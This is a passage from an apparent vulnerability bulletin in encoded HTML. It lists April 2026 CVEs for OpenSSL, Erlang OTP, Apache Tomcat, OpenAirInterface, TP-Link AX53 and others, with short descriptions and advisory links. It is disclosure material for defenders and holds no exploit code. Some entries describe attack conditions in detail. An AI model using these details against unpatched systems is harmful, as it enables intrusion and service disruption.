that reason the issue was assessed as Low severity according to our Securi=
ty Policy. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected =
by this issue, as the affected code is outside the OpenSSL FIPS module boun= dary.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28388" target=3D= "_blank" rel=3D"noopener">CVE-2026-28388</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da5= 5139" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305= d591cf2e" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: During processing of a crafted CMS EnvelopedData message=
with KeyAgreeRecipientInfo a NULL pointer dereference can happen. Impact s= ummary: Applications that process attacker-controlled CMS data may crash be= fore authentication or cryptographic operations occur resulting in Denial o=
f Service. When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo=
is processed, the optional parameters field of KeyEncryptionAlgorithmIdent= ifier is examined without checking for its presence. This results in a NULL=
pointer dereference if the field is missing. Applications and services tha=
t call CMS_decrypt() on untrusted input (e.g., S/MIME processing or CMS-bas=
ed protocols) are vulnerable. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.=
0 are not affected by this issue, as the affected code is outside the OpenS=
SL FIPS module boundary.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28389" target=3D= "_blank" rel=3D"noopener">CVE-2026-28389</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248= 172a" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df53409= 23fa807f" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">OpenSSL--OpenSSL</td>
<td>Issue summary: During processing of a crafted CMS EnvelopedData message=
with KeyTransportRecipientInfo a NULL pointer dereference can happen. Impa=
ct summary: Applications that process attacker-controlled CMS data may cras=
h before authentication or cryptographic operations occur resulting in Deni=
al of Service. When a CMS EnvelopedData message that uses KeyTransportRecip= ientInfo with RSA-OAEP encryption is processed, the optional parameters fie=
ld of RSA-OAEP SourceFunc algorithm identifier is examined without checking=
for its presence. This results in a NULL pointer dereference if the field =
is missing. Applications and services that call CMS_decrypt() on untrusted = input (e.g., S/MIME processing or CMS-based protocols) are vulnerable. The = FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, =
as the affected code is outside the OpenSSL FIPS module boundary.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28390" target=3D= "_blank" rel=3D"noopener">CVE-2026-28390</a></td>

<a href=3D"https://openssl-library.org/news/secadv/20260407.txt" target=3D"= _blank" rel=3D"noopener">OpenSSL Advisory</a><br><a href=3D"https://github.= com/openssl/openssl/commit/01194a8f1941115cd0383bfa91c736dd3993c8bc" target= =3D"_blank" rel=3D"noopener">3.6.2 git commit</a><br><a href=3D"https://git= hub.com/openssl/openssl/commit/2e39b7a6993be445fddb9fbce316fa756e0397b6" ta= rget=3D"_blank" rel=3D"noopener">3.5.6 git commit</a><br><a href=3D"https:/= /github.com/openssl/openssl/commit/ea7b4ea4f9f853521ba34830cbcadc970d2e0788=
" target=3D"_blank" rel=3D"noopener">3.4.5 git commit</a><br><a href=3D"htt= ps://github.com/openssl/openssl/commit/fd2f1a6cf53b9ceeca723a001aa4b825d7c7= ee75" target=3D"_blank" rel=3D"noopener">3.3.7 git commit</a><br><a href=3D= "https://github.com/openssl/openssl/commit/af2a5fecd3e71a29e7568f9c1453dec5= cebbaff4" target=3D"_blank" rel=3D"noopener">3.0.20 git commit</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Japan Computer Emergency Response Team Coordin= ation Center (JPCERT/CC)--Emocheck</td>
<td>Emocheck insecurely loads Dynamic Link Libraries (DLLs). If a crafted D=
LL file is placed to the same directory, an arbitrary code may be executed = with the privilege of the user invoking EmoCheck.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28704" target=3D= "_blank" rel=3D"noopener">CVE-2026-28704</a></td>

<a href=3D"https://www.jpcert.or.jp/press/2026/PR20260410.html" target=3D"_= blank" rel=3D"noopener">https://www.jpcert.or.jp/press/2026/PR20260410.html= </a><br><a href=3D"https://github.com/JPCERTCC/EmoCheck/" target=3D"_blank"=
rel=3D"noopener">https://github.com/JPCERTCC/EmoCheck/</a><br><a href=3D"h= ttps://jvn.jp/en/jp/JVN00263243/" target=3D"_blank" rel=3D"noopener">https:= //jvn.jp/en/jp/JVN00263243/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Erlang--OTP</td>
<td>Incorrect Authorization vulnerability in Erlang OTP (inets modules) all= ows unauthenticated access to CGI scripts protected by directory rules when=
served via script_alias. When script_alias maps a URL prefix to a director=
y outside DocumentRoot, mod_auth evaluates directory-based access controls = against the DocumentRoot-relative path while mod_cgi executes the script at=
the ScriptAlias-resolved path. This path mismatch allows unauthenticated a= ccess to CGI scripts that directory rules were meant to protect. This vulne= rability is associated with program files lib/inets/src/http_server/mod_ali= as.erl, lib/inets/src/http_server/mod_auth.erl, and lib/inets/src/http_serv= er/mod_cgi.erl. This issue affects OTP from OTP 17.0 until OTP 28.4.2, 27.3= .4.10 and 26.2.5.19 corresponding to inets from 5.10 until 9.6.2, 9.3.2.4 a=
nd 9.1.0.6.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28808" target=3D= "_blank" rel=3D"noopener">CVE-2026-28808</a></td>

<a href=3D"https://github.com/erlang/otp/security/advisories/GHSA-3vhp-h532= -mc3f" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/sec= urity/advisories/GHSA-3vhp-h532-mc3f</a><br><a href=3D"https://cna.erlef.or= g/cves/CVE-2026-28808.html" target=3D"_blank" rel=3D"noopener">https://cna.= erlef.org/cves/CVE-2026-28808.html</a><br><a href=3D"https://osv.dev/vulner= ability/EEF-CVE-2026-28808" target=3D"_blank" rel=3D"noopener">https://osv.= dev/vulnerability/EEF-CVE-2026-28808</a><br><a href=3D"https://www.erlang.o= rg/doc/system/versions.html#order-of-versions" target=3D"_blank" rel=3D"noo= pener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a= ><br><a href=3D"https://github.com/erlang/otp/commit/8fc71ac6af4fbcc54103be= c2983ef22e82942688" target=3D"_blank" rel=3D"noopener">https://github.com/e= rlang/otp/commit/8fc71ac6af4fbcc54103bec2983ef22e82942688</a><br><a href=3D= "https://github.com/erlang/otp/commit/9dfa0c51eac97866078e808dec2183cb7871f= f7c" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/commi= t/9dfa0c51eac97866078e808dec2183cb7871ff7c</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Erlang--OTP</td>
<td>Generation of Predictable Numbers or Identifiers vulnerability in Erlan= g/OTP kernel (inet_res, inet_db modules) allows DNS Cache Poisoning. The bu= ilt-in DNS resolver (inet_res) uses a sequential, process-global 16-bit tra= nsaction ID for UDP queries and does not implement source port randomizatio=
n. Response validation relies almost entirely on this ID, making DNS cache = poisoning practical for an attacker who can observe one query or predict th=
e next ID. This conflicts with RFC 5452 recommendations for mitigating forg=
ed DNS answers. inet_res is intended for use in trusted network environment=
s and with trusted recursive resolvers. Earlier documentation did not clear=
ly state this deployment assumption, which could lead users to deploy the r= esolver in environments where spoofed DNS responses are possible. This vuln= erability is associated with program files lib/kernel/src/inet_db.erl and l= ib/kernel/src/inet_res.erl. This issue affects OTP from OTP 17.0 until OTP = 28.4.2, 27.3.4.10 and 26.2.5.19 corresponding to kernel from 3.0 until 10.6= .2, 10.2.7.4 and 9.2.4.11.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-28810" target=3D= "_blank" rel=3D"noopener">CVE-2026-28810</a></td>

<a href=3D"https://github.com/erlang/otp/security/advisories/GHSA-v884-5jg5= -whj8" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/sec= urity/advisories/GHSA-v884-5jg5-whj8</a><br><a href=3D"https://cna.erlef.or= g/cves/CVE-2026-28810.html" target=3D"_blank" rel=3D"noopener">https://cna.= erlef.org/cves/CVE-2026-28810.html</a><br><a href=3D"https://osv.dev/vulner= ability/EEF-CVE-2026-28810" target=3D"_blank" rel=3D"noopener">https://osv.= dev/vulnerability/EEF-CVE-2026-28810</a><br><a href=3D"https://www.erlang.o= rg/doc/system/versions.html#order-of-versions" target=3D"_blank" rel=3D"noo= pener">https://www.erlang.org/doc/system/versions.html#order-of-versions</a= ><br><a href=3D"https://github.com/erlang/otp/commit/36f23c9d2cc54afe83671d= d7343596d7972839a5" target=3D"_blank" rel=3D"noopener">https://github.com/e= rlang/otp/commit/36f23c9d2cc54afe83671dd7343596d7972839a5</a><br><a href=3D= "https://github.com/erlang/otp/commit/dd15e8eb03548c5e55e9915f0e91389ec6bad= 9fd" target=3D"_blank" rel=3D"noopener">https://github.com/erlang/otp/commi= t/dd15e8eb03548c5e55e9915f0e91389ec6bad9fd</a><br><a href=3D"https://github= .com/erlang/otp/commit/b057a9d995017b1be50d6dc02edd52382f3231b8" target=3D"= _blank" rel=3D"noopener">https://github.com/erlang/otp/commit/b057a9d995017= b1be50d6dc02edd52382f3231b8</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Configured cipher preference order not preserved vulnerability in Apach=
e Tomcat. This issue affects Apache Tomcat: from 11.0.16 through 11.0.18, f= rom 10.1.51 through 10.1.52, from 9.0.114 through 9.0.115. Users are recomm= ended to upgrade to version 11.0.20, 10.1.53 or 9.0.116, which fix the issu= e.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29129" target=3D= "_blank" rel=3D"noopener">CVE-2026-29129</a></td>

<a href=3D"https://lists.apache.org/thread/r4h1t6f8xhxsxfm6c2z5cprolsosho3f=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/r4h1t6= f8xhxsxfm6c2z5cprolsosho3f</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>CLIENT_CERT authentication does not fail as expected for some scenarios=
when soft fail is disabled vulnerability in Apache Tomcat, Apache Tomcat N= ative. This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.18, fr=
om 10.1.0-M7 through 10.1.52, from 9.0.83 through 9.0.115; Apache Tomcat Na= tive: from 1.1.23 through 1.1.34, from 1.2.0 through 1.2.39, from 1.3.0 thr= ough 1.3.6, from 2.0.0 through 2.0.13. Users are recommended to upgrade to = version Tomcat Native 1.3.7 or 2.0.14 and Tomcat 11.0.20, 10.1.53 and 9.0.1= 16, which fix the issue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29145" target=3D= "_blank" rel=3D"noopener">CVE-2026-29145</a></td>

<a href=3D"https://lists.apache.org/thread/yz5fxmhd2j43wgqykssdo7kltws57jfz=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/yz5fxm= hd2j43wgqykssdo7kltws57jfz</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Apache Software Foundation--Apache Tomcat</td> <td>Padding Oracle vulnerability in Apache Tomcat's EncryptInterceptor with=
default configuration. This issue affects Apache Tomcat: from 11.0.0-M1 th= rough 11.0.18, from 10.0.0-M1 through 10.1.52, from 9.0.13 through 9..115, = from 8.5.38 through 8.5.100, from 7.0.100 through 7.0.109. Users are recomm= ended to upgrade to version 11.0.19, 10.1.53 and 9.0.116, which fixes the i= ssue.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29146" target=3D= "_blank" rel=3D"noopener">CVE-2026-29146</a></td>

<a href=3D"https://lists.apache.org/thread/lzt04z2pb3dc5tk85obn80xygw3z1p0w=
" target=3D"_blank" rel=3D"noopener">https://lists.apache.org/thread/lzt04z= 2pb3dc5tk85obn80xygw3z1p0w</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a--n/a</td>
<td>PHP-MYSQL-User-Login-System v1.0 was discovered to contain a SQL inject= ion vulnerability via the username parameter at login.php.</td> <td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29861" target=3D= "_blank" rel=3D"noopener">CVE-2026-29861</a></td>

<a href=3D"https://github.com/amanyadav78/CVE-2026-29861" target=3D"_blank"=
rel=3D"noopener">https://github.com/amanyadav78/CVE-2026-29861</a><br>=C2= =A0</td>
</tr>

<td class=3D"vendor-product">Entechtaiwan[.]com =E2=80=93 PowerStrip</td> <td>The pstrip64.sys driver in EnTech Taiwan PowerStrip &lt;=3D3.90.736 all= ows local users to escalate privileges to SYSTEM via a crafted IOCTL reques=
t enabling unprivileged users to map arbitrary physical memory into their a= ddress space and modify critical kernel structures.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-29923" target=3D= "_blank" rel=3D"noopener">CVE-2026-29923</a></td>

<a href=3D"https://entechtaiwan.com/util/ps.shtm" target=3D"_blank" rel=3D"= noopener">https://entechtaiwan.com/util/ps.shtm</a><br><a href=3D"https://p= acketstorm.news/files/id/218394/" target=3D"_blank" rel=3D"noopener">https:= //packetstorm.news/files/id/218394/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- OpenAirInterface</td>
<td>OpenAirInterface Version 2.2.0 has a Buffer Overflow vulnerability in p= rocessing UplinkNASTransport containing Authentication Response containing =
a NAS PDU with oversize response (For example 100 byte). The response is de= coded by AMF and passed to the AUSF component for verification. AUSF crashe=
s on receiving this oversize response. This can prohibit users from further=
registration and verification and can cause Denial of Services (DoS).</td> <td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30075" target=3D= "_blank" rel=3D"noopener">CVE-2026-30075</a></td>

<a href=3D"https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues?show= =3DeyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2FpL2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1= NDE5fQ%3D%3D" target=3D"_blank" rel=3D"noopener">https://gitlab.eurecom.fr/= oai/cn5g/oai-cn5g-ausf/-/issues?show=3DeyJpaWQiOiI2IiwiZnVsbF9wYXRoIjoib2Fp= L2NuNWcvb2FpLWNuNWctYXVzZiIsImlkIjo1NDE5fQ%3D%3D</a><br><a href=3D"https://= gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6" target=3D"_blank" rel= =3D"noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-ausf/-/issues/6</= a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- OpenAirInterface</td>
<td>OpenAirInterface V2.2.0 AMF crashes when it receives an NGAP message wi=
th invalid procedure code or invalid PDU-type. For example when the message=
specification requires InitiatingMessage but sent with successfulOutcome.<=

<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30078" target=3D= "_blank" rel=3D"noopener">CVE-2026-30078</a></td>

<a href=3D"https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/74" tar= get=3D"_blank" rel=3D"noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g= -amf/-/issues/74</a><br><a href=3D"https://gitlab.eurecom.fr/oai/cn5g/oai-c= n5g-amf/-/merge_requests/414" target=3D"_blank" rel=3D"noopener">https://gi= tlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/merge_requests/414</a><br>=C2=A0</t=

</tr>

<td class=3D"vendor-product">n/a-- OpenAirInterface</td>
<td>In OpenAirInterface V2.2.0 AMF, Out of sequence messages causes incorre=
ct state transition during UE registration procedure. This allows authentic= ation to be bypassed completely. If a SecurityModeComplete message is sent = after InitialUERegistration, a registration reject is received followed by =
a registration accept! This leads the UE to be registered without proper au= thentication.</td>
<td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30079" target=3D= "_blank" rel=3D"noopener">CVE-2026-30079</a></td>

<a href=3D"https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/77" tar= get=3D"_blank" rel=3D"noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g= -amf/-/issues/77</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">n/a-- OpenAirInterface</td>
<td>OpenAirInterface v2.2.0 accepts Security Mode Complete without any inte= grity protection. Configuration has supported integrity NIA1 and NIA2. But =
if an UE sends initial registration request with only security capability I= A0, OpenAirInterface accepts and proceeds. This downgrade security context = can lead to the possibility of replay attack.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30080" target=3D= "_blank" rel=3D"noopener">CVE-2026-30080</a></td>

<a href=3D"https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g-amf/-/issues/78" tar= get=3D"_blank" rel=3D"noopener">https://gitlab.eurecom.fr/oai/cn5g/oai-cn5g= -amf/-/issues/78</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">chartbrew--chartbrew</td>
<td>Chartbrew is an open-source web application that can connect directly t=
o databases and APIs and use the data to create charts. Prior to 4.8.5, Cha= rtbrew allows authenticated users to create API data connections with arbit= rary URLs. The server fetches these URLs using request-promise without any =
IP address validation, enabling Server-Side Request Forgery attacks against=
internal networks and cloud metadata endpoints. This vulnerability is fixe=
d in 4.8.5.</td>
<td>2026-04-10</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30232" target=3D= "_blank" rel=3D"noopener">CVE-2026-30232</a></td>

<a href=3D"https://github.com/chartbrew/chartbrew/security/advisories/GHSA-= p4rg-967r-w4cv" target=3D"_blank" rel=3D"noopener">https://github.com/chart= brew/chartbrew/security/advisories/GHSA-p4rg-967r-w4cv</a><br><a href=3D"ht= tps://github.com/chartbrew/chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f1640= 7d59c2df1" target=3D"_blank" rel=3D"noopener">https://github.com/chartbrew/= chartbrew/commit/9c4a7e2b02acb25f0782bd4ac1f16407d59c2df1</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">n/a-- Daylight Studio FuelCMS</td>
<td>Daylight Studio FuelCMS v1.5.2 was discovered to contain an authenticat=
ed remote code execution (RCE) vulnerability in the Blocks module.</td> <td>2026-04-07</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30460" target=3D= "_blank" rel=3D"noopener">CVE-2026-30460</a></td>

<a href=3D"https://github.com/daylightstudio/FUEL-CMS/" target=3D"_blank" r= el=3D"noopener">https://github.com/daylightstudio/FUEL-CMS/</a><br><a href= =3D"http://daylight.com" target=3D"_blank" rel=3D"noopener">http://daylight= .com</a><br><a href=3D"http://fuelcms.com" target=3D"_blank" rel=3D"noopene= r">http://fuelcms.com</a><br><a href=3D"https://pentest-tools.com/PTT-2025-= 027-Improper-Authorization.pdf" target=3D"_blank" rel=3D"noopener">https://= pentest-tools.com/PTT-2025-027-Improper-Authorization.pdf</a><br>=C2=A0</td=

</tr>

<td class=3D"vendor-product">Ms4w[.]com -- GatewayGeo Mapserver=C2=A0</td> <td>A Dynamic-link Library Injection vulnerability in GatewayGeo MapServer = for Windows version 5 allows attackers to escalate privileges via a crafted=
executable.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30478" target=3D= "_blank" rel=3D"noopener">CVE-2026-30478</a></td>

<a href=3D"https://ms4w.com" target=3D"_blank" rel=3D"noopener">https://ms4= w.com</a><br><a href=3D"https://github.com/penjaminTester/Research/tree/mai= n/CVE-2026-30478" target=3D"_blank" rel=3D"noopener">https://github.com/pen= jaminTester/Research/tree/main/CVE-2026-30478</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Ms4w[.]com -- GatewayGeo Mapserver=C2=A0</td> <td>A Dynamic-link Library Injection vulnerability in OSGeo Project MapServ=
er before v8.0 allows attackers to execute arbitrary code via a crafted exe= cutable.</td>
<td>2026-04-09</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30479" target=3D= "_blank" rel=3D"noopener">CVE-2026-30479</a></td>

<a href=3D"https://mapserver.org/index.html" target=3D"_blank" rel=3D"noope= ner">https://mapserver.org/index.html</a><br><a href=3D"https://github.com/= penjaminTester/Research/tree/main/CVE-2026-30479" target=3D"_blank" rel=3D"= noopener">https://github.com/penjaminTester/Research/tree/main/CVE-2026-304= 79</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">Aziot[.]life -- AZIOT 1 Node Smart Switch</td> <td>An information disclosure vulnerability exists in AZIOT 1 Node Smart Sw= itch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to imprope=
r access control on the UART debug interface. An attacker with physical acc= ess can connect to the UART interface and obtain sensitive information from=
the serial console without authentication.</td>
<td>2026-04-06</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30613" target=3D= "_blank" rel=3D"noopener">CVE-2026-30613</a></td>

<a href=3D"http://aziot.com" target=3D"_blank" rel=3D"noopener">http://azio= t.com</a><br><a href=3D"https://github.com/dumbermore/tuya/blob/main/README= .md" target=3D"_blank" rel=3D"noopener">https://github.com/dumbermore/tuya/= blob/main/README.md</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
<td>A stack-based buffer overflow in the tmpServer module of TP-Link Archer=
AX53 v1.0=C2=A0allows an authenticated adjacent attacker to trigger a segm= entation fault and potentially execute arbitrary code via a specially craft=
ed configuration file. Successful exploitation may cause a crash and could = allow arbitrary code execution, enabling modification of device state, expo= sure of sensitive data, or further compromise of device integrity. This iss=
ue affects AX53 v1.0: before 1.7.1 Build 20260213.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30814" target=3D= "_blank" rel=3D"noopener">CVE-2026-30814</a></td>

<a href=3D"https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firm= ware" target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/my/support= /download/archer-ax53/v1/#Firmware</a><br><a href=3D"https://www.tp-link.co= m/en/support/download/archer-ax53/v1/#Firmware" target=3D"_blank" rel=3D"no= opener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmwar= e</a><br><a href=3D"https://talosintelligence.com/vulnerability_reports/" t= arget=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulnerabili= ty_reports/</a><br><a href=3D"https://www.tp-link.com/us/support/faq/5055/"=
target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/us/support/faq/= 5055/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
<td>An OS command injection vulnerability in the OpenVPN module of TP-Link = Archer AX53 v1.0=C2=A0allows an authenticated adjacent attacker to execute = system commands when a specially crafted configuration file is processed=C2= =A0due to insufficient input validation. Successful exploitation may allow = modification of configuration files, disclosure of sensitive information, o=
r further compromise of device integrity. This issue affects AX53 v1.0: bef= ore 1.7.1 Build 20260213.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30815" target=3D= "_blank" rel=3D"noopener">CVE-2026-30815</a></td>

<a href=3D"https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firm= ware" target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/my/support= /download/archer-ax53/v1/#Firmware</a><br><a href=3D"https://www.tp-link.co= m/en/support/download/archer-ax53/v1/#Firmware" target=3D"_blank" rel=3D"no= opener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmwar= e</a><br><a href=3D"https://talosintelligence.com/vulnerability_reports/" t= arget=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulnerabili= ty_reports/</a><br><a href=3D"https://www.tp-link.com/us/support/faq/5055/"=
target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/us/support/faq/= 5055/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
<td>An external control of configuration vulnerability in the OpenVPN modul= e=C2=A0of TP-Link AX53 v1.0=C2=A0allows an authenticated adjacent attacker =
to read arbitrary file when a malicious configuration file is processed.=C2= =A0 Successful exploitation may allow unauthorized access to arbitrary file=
s on the device, potentially exposing sensitive information.This issue affe= cts AX53 v1.0: before 1.7.1 Build 20260213.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30816" target=3D= "_blank" rel=3D"noopener">CVE-2026-30816</a></td>

<a href=3D"https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firm= ware" target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/my/support= /download/archer-ax53/v1/#Firmware</a><br><a href=3D"https://www.tp-link.co= m/en/support/download/archer-ax53/v1/#Firmware" target=3D"_blank" rel=3D"no= opener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmwar= e</a><br><a href=3D"https://talosintelligence.com/vulnerability_reports/" t= arget=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulnerabili= ty_reports/</a><br><a href=3D"https://www.tp-link.com/us/support/faq/5055/"=
target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/us/support/faq/= 5055/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
<td>An external configuration control vulnerability in the OpenVPN module= =C2=A0of TP-Link AX53 v1.0=C2=A0allows an authenticated adjacent attacker t=
o read arbitrary files when a malicious configuration file is processed. Su= ccessful exploitation may allow unauthorized access to arbitrary files on t=
he device, potentially exposing sensitive information.This issue affects AX=
53 v1.0: before 1.7.1 Build 20260213.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
<td><a href=3D"https://www.cve.org/CVERecord?id=3DCVE-2026-30817" target=3D= "_blank" rel=3D"noopener">CVE-2026-30817</a></td>

<a href=3D"https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firm= ware" target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/my/support= /download/archer-ax53/v1/#Firmware</a><br><a href=3D"https://www.tp-link.co= m/en/support/download/archer-ax53/v1/#Firmware" target=3D"_blank" rel=3D"no= opener">https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmwar= e</a><br><a href=3D"https://talosintelligence.com/vulnerability_reports/" t= arget=3D"_blank" rel=3D"noopener">https://talosintelligence.com/vulnerabili= ty_reports/</a><br><a href=3D"https://www.tp-link.com/us/support/faq/5055/"=
target=3D"_blank" rel=3D"noopener">https://www.tp-link.com/us/support/faq/= 5055/</a><br>=C2=A0</td>
</tr>

<td class=3D"vendor-product">TP-Link Systems Inc.--AX53 v1.0</td>
<td>An OS command injection vulnerability in the dnsmasq module of TP-Link = Archer AX53 v1.0 allows an authenticated adjacent attacker to execute arbit= rary code when a specially crafted configuration file is processed due to i= nsufficient input validation. Successful exploitation may allow the attacke=
r to modify device configuration, access sensitive information, or further = compromise system integrity. This issue affects AX53 v1.0: before 1.7.1 Bui=
ld 20260213.</td>
<td>2026-04-08</td>
<td>not yet calculated</td>
